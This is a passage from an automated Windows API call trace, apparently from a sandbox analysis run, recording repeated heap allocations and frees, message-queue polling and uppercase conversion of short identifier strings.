wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0196.962] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0196.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.963] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0196.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.963] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0196.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0196.963] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.963] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.964] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.964] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.966] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0197.013] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0197.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0197.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0197.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0197.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0197.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0197.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0197.013] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0197.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0197.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0197.013] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0197.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0197.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0197.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0197.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0197.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0197.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0197.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0197.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0197.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0197.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0197.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0197.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0197.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0197.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0197.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0197.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0197.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0197.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0197.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0197.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.015] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0197.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0197.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0197.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0197.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0197.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0197.016] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0197.016] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0197.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0197.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0197.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0197.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0197.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0197.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0197.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0197.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0197.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0197.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.017] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0197.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0197.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0197.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.017] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0197.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0197.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0197.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.018] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0197.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0197.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0197.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0197.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 